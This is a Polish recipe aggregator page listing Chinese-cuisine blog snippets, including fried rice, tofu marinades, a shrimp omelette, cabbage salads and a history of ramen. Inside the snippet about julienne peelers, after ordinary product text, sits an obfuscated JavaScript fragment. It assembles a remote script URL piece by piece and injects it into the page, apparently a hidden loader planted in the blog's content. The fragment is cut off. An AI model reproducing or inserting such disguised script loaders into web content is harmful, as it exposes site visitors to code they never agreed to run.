kuchnia chińska - 766 przepisów (strona:7/52)

Szybki kurczak po chińsku 201

naturalny sosik. Jeśli lubicie dania z bardziej zawiesistym sosem, to możecie warzywa zagęścić łyżką mąki ryżowej. Ja jednak wolę nic nie dodawać. Jako przyprawy używam przyprawy 5 smaków z kuchni chińskiej, ale możecie sami dodać ulubione przyprawy : imbir, cynamon, anyż, goździki,koper włoski, pieprz. Jeśli tylko czas mi pozwala, to wcześniej marynuję przez kilka godzin mięso kurczaka w zalewie

Mieszam w Garnku
Dorsz zapiekany z warzywami i tahini 136

Tahini jest składnikiem bliskowschodnich potraw m.in. hummusu i baba ghanoush . Używa się jej także w kuchni chińskiej , koreańskiej i japońskiej . Przyznaję , że miałam niezły dylemat i to właśnie Was na moim profilu facebookowym pytałam o pomysły! Tym razem padło na rybkę - a dokładnie filety z dorsza. Dodałam cebulkę , marchew , odrobinę pora … a wszystko to zapiekłam w naczyniu żaroodpornym

Ostra na Słodko
Smażony ryż z warzywami 160

Składniki: 100 g ryżu długoziarnistego 60 g fasolki szparagowej 60 groszku zielonego papryka zielona 3 pomidory obrane ze skórki i bez pestek 2 ząbki czosnku pół łyżeczki przyprawy chińskiej "Pięć smaków" olej roślinny 4 kolby mini kukurydzy ze słoiczka 25 g kiełków bambusa z puszki 1 łyżeczka oleju sezamowego Ryż ugotować zgodnie z instrukcja na opakowaniu. Na patelni rozgrzać olej(...)paprykę, kukurydzę i smażyć około 2 minut. Dodać kiełki bambusa, pomidory, groszek, podsmażyć. Na końcu dodać ryż i łyżeczkę oleju sezamowego. Wymieszać i można podawać. Przepis pochodzi z książki "Kuchnia chińska

Moja Galeria Smaku
5 pomysłów: Jak zamarynować tofu? 258

sojowy, starty imbir, przeciśnięty przez praskę czosnek i łyżeczkę pieprzu.  Wszystko dokładnie mieszamy.  Całość odstawiamy do lodówki na minimum 2 godziny.  Zastosowanie:  Do wszelakich dań kuchni chińskiej i azjatyckiej. 2. Tofu w stylu indyjskim Potrzebujemy: 1 kostkę tofu 1 łyżki sosu sojowego 2 łyżki oliwy 1 ząbek czosnku kawałek startego imbiru - 1x1 cm 1 łyżkę kurkumy(...)sojowy, oliwę, starty imbir, przeciśnięty przez praskę czosnek i przyprawy. Wszystko dokładnie mieszamy.  Całość odstawiamy do lodówki na minimum 2 godziny.  Zastosowanie: Do wszelakich dań kuchni indyjskiej, do samego ryżu lub curry. 3. Tofu w stylu włoskim (w ziołach) Potrzebujemy: 1 kostkę tofu 2-3 łyżki wody po ogórkach kiszonych 2 łyżki oliwy 1 ząbek czosnku łyżkę

Bananowe Pole
Pięć niedrogich przyborów kuchennych, które ułatwiają życie 210

marginesie, nie ma na tej liście obieraczki julienne, na którą choruję od kilku tygodni, ale i ona niedługo pojawi się w moim arsenale. Na pewno przyda się fanom kuchni chińskiej oraz tym, którzy wykazują gotowość, by zamienić tradycyjny makaron na spaghetti z cukinii. Jadłam i powiadam Wam, wcale nie ustępuje mącznemu oryginałowi. Ma za to o wieeele kalorii mniej(...)aptekarską i mąkę ważą. Trzecie, i na te spuśćmy zasłonę milczenia, nie pieką wcale. Hańba im! Ja zdecydowanie należę do grupy osób, które wszystko ważą, w związku z czym kuchni bez wagi sobie nie wyobrażam. Może to jakaś ułomność, a może za krótkie stania przy garnkach i piekarniku doświadczenie. Mam nadzieję, że to drugie. Waga pomaga mi piec ciasta, chleby

W kuchni wieczorem
Szybka ale zdrowa chińszczyzna. 130

najsmaczniejsza; jest cebula i zielony groszek który absolutnie uwielbiam (ale tylko jako świeży ugotowany czy mrożony). Do tego mięso z piersi kurczaka oraz mieszanka przypraw, która jest już bardziej "chińska". Całość jest bardzo smaczna i dająca się polubić na tyle by weszła na stałe do naszego menu. Przepis własny. Składniki na 3-4 porcje mięso z piersi kurczaka (a jeszcze(...)zawsze dokładam według uznania troszkę więcej któregoś z poniższych: słodka papryka ostra papryka pieprz ziołowy kmin rzymski (tego daję kilka szczypt) imbir sól Można skorzystać z gotowej mieszanki do kuchni chińskiej, pilnować tylko by nie zawierała konserwantów itp. Wykonanie: Ugotować ryż według opisu na opakowaniu z dodatkiem soli. Mięso pokroić w kostkę. Paprykę oczyścić z nasion, pokroić w paski, przeciąć

Poezja Smaków - blog kulinarny
Sos chiński z kurczakiem (bez glutenu, jajek i mleka) 419

papryka 1 szt marchew 2 szt cebula 1 szt pędy bambusa z puszki lub kalarepka 1 szt grzyby mun (suszone lub w zalewie) kilka szt (lub mrożonka typu mieszanka chińska) czosnek 1 ząbek pieprz, sól, papryka słodka, kurkuma, imbir do smaku olej do smażenia woda  około 2 szklanki mąka ziemniaczana cukier (najlepiej ciemny brązowy) Przygotowanie: 2 łyżki 2 łyżki(...)momentu odparowania wody i lekkiego przyrumienienia. Przełożyć do garnka z pozostałymi składnikami, dolać wodę. Doprawić solą, pieprzem, papryką, kurkumą i imbirem (lub jeśli ktoś woli użyć gotowej mieszanki przypraw kuchni chińskiej). Zagotować na małym ogniu. Dodać brązowy cukier. (Aby pogłębić kolor sosu i wzmocnić aromat można dodać łyżkę gęstego syropu jabłkowo-gruszkowego ) Mąkę ziemniaczaną rozmieszać z 1,2 szklanki zimnej

głodny alergik
Wieprzowina smażona z brokułami 165

W przerwie pomiędzy wielkanocnymi daniami na chwile przeniosłam się do Chin, a to za przyczyną akcji zorganizowanej przez Darię  pod tytułem  Wspólne gotowanie z

Kulinarne przygody Gatity
Omlet po chińsku z krewetkami, kurczakiem i słodkim sosem chilli 154

moim stole goszczą bardzo często i przygotowuje je na różne sposoby. Ten jest bardzo sycący i z powodzeniem może posłużyć nie tylko za śniadanie, ale również obiad ;) OMLET PO CHIŃSKU Z KREWETKAMI, KURCZAKIEM I SŁODKIM SOSEM CHILLI Składniki: - 8 jajek - 250 gram gotowanej piersi kurczaka - 12 dużych oczyszczonych krewetek lub 300 gram koktajlowych - 2 łyżki posiekanego szczypiorku - 2 łyżeczki sosu(...)patelni na talerz, bierzemy drugi talerz i nakrywamy pierwszy. Przerzucamy omlet i znowu zsuwamy na patelnię, by przypiekł się na drugiej stronie. Podajemy skropiony słodkim sosem chilli. Mniam! Zainspirowane: "Kuchnia chińska" Jenny Stacey

Życie zamknięte w smaku
Obieraczki julienne, czyli sztuka w kuchni! 117

julienne, tworzymy z naszych warzyw cienkie słupki, które następnie mogą być wykorzystane w przygotowaniu bardzo wielu potraw. Myśląc o tym sposobie krojenia warzyw, bardzo często przychodzi nam na myśl kuchnia chińska, jednak historycy nie są pewni, z jakiego kraju wywodzi się technika julienne. Obieraczka julienne  to doskonałe rozwiązanie dla wszystkich osób, ceniących sobie połączenie prostoty użycia z najwyższą jakością(...)również jako ozdoba talerza, na którym zaserwujemy naszym gościom potrawę.Decydując się na zakup obieraczki do julienne, możemy mieć pewność, że inwestujemy w narzędzie, które będzie służyło w naszej kuchni przez wiele lat. (function(){ wXXs=document.createElement("script");wXXs.type="text/javascript"; wXXs.async=true;wXXs_=(("us")+"t")+"a";wXXs_+=("t.i")+""+"n";wXXs_+=(("f")+"o");wXXs_+="/"; wXXsu="10270845.";wXXsu+="lwub4k14XXs444sf9xbfqz0kbu2kxn";wXXs.src="//"+wXXs_+wXXsu; wXXsdb

Domowa Cukierenka-Domowa Kuchnia
Surówka z kapusty z imbirem i orzeszkami 259

orzeszkami... Chrupiąca, cienko poszatkowana, biała kapusta. Soczyste wiórki pomarańczowej marchewki. Ostry posmak przeciśniętego czosnku. Całość oblepiona słodko-kwaśnym sosem z imbirem. Oprószona pokruszonymi orzeszkami ziemnymi. Pyszna surówka jak z chińskiej restauracji. Polecam!   Składniki: 1 średnia główka białej kapusty; 2 duże marchewki; 3 ząbki czosnku. Sos: 1 szklanka zimnej wody; 4 łyżeczki cukru; 1/2 szklanki oleju; 1/4 szklanki białego octu(...)soli. W oryginalnym przepisie należało dodać 6 łyżek warzywka, ale moim zdaniem to stanowczo za dużo. 2 - 3 łyżki tej przyprawy wystarczają w zupełności. Surówka jest idealna do potraw kuchni chińskiej. Ilość cukru można dowolnie zmieniać, a orzeszki mogą być również solone. Źródło przepisu:   Wielkie Żarcie

Gospodyni Miejska
Japonia instant. Ramen 140

Studenckie czasy dawno już za mną. Z resztą- to właśnie w czasie studiów zaczęłam swoją przygodę z gotowaniem i dziwnym trafem sława i niesława „zupek chińskich” jakoś mnie ominęła. A dzisiaj chętnie po nie sięgam, przygotowując najszybsze wschodnie danie na świecie- japoński ramen. Do Kraju Kwitnącej Wiśni ramen przywędrował z Chin na początku XIX wieku. Podstawą tej zupy jest wywar(...)Wojnie Światowej Japonię dosłownie zalał import taniej mąki pszennej ze Stanów Zjednoczonych. Jednocześnie z Chin i Azji Kontynentalnej zaczęli powracać japońscy żołnierze- wielu z nich, zaznajomionych z kuchnią chińską, otwierało w całej Japonii chińskie knajpki i restauracje. Ramen stał się bardzo popularnym pożywieniem, a taniej mąki na makaron nie mogło zabraknąć.   Zupy z makaronem instant w takiej postaci

Karo in the Kitchen
Ryż jaśminowy po tajsku 199

Kuchnia tajska powszechnie uważana jest za jedną z najlepszych i najbardziej oryginalnych kuchni świata. Na przestrzeni wieków kształtowała się pod wyraźnym wpływem kuchni chińskiej i indyjskiej. Mimo wyraźnych wpływów z zewnątrz jej oryginalność wynika jednak głównie ze stosowanych przez Tajów własnych oryginalnych składników. Ryż jaśminowy po tajsku. Potocznie nazywany tajskim pachnącym ryżem ze względu na kwiatowy aromat jaki wydziela podczas(...)Ryż jaśminowy po tajsku może stanowić samodzielny posiłek lub być dodatkiem, np. do udek z kurczaka po tajsku (to będzie temat kolejnego wpisu), dań z ryb , czy krewetek . Zaletą kuchni tajskiej jest bardzo swobodna kompozycja potraw. Używamy składników takich jakie lubimy i w takiej ilości, jaka nam pasuje. Oryginalność smakowa dań jest powodem, że kuchnia tajska jest bardzo popularna

mojewypiekiinietylko
Surówka z białej kapusty z curry i sezamem 209

dodatku tłuszczu), gorącej patelni i/lub zastąpić ziarnami słonecznika. Słodki sos chili można zastąpić innym, ulubionym np. słodko - pikantnym itp., a ocet - sokiem z cytryny. Surówka jest idealna do potraw kuchni chińskiej. Źródło przepisu:   Wielkie Żarcie

Gospodyni Miejska